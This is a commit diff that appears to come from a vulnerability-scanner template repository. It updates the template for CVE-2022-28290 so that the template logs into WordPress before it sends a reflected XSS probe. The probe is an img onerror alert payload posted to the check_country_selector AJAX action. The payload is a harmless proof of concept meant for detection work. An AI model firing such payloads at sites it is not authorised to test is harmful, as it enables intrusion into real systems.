Update CVE-2022-28290.yaml

patch-1
Ritik Chaddha 2022-10-18 14:03:08 +05:30 committed by GitHub
parent 65901f5858
commit 36e1e9f630
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

View File

@ -15,6 +15,13 @@ info:
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2
Host: {{Hostname}}
@ -22,6 +29,8 @@ requests:
country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US
skip-variables-check: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word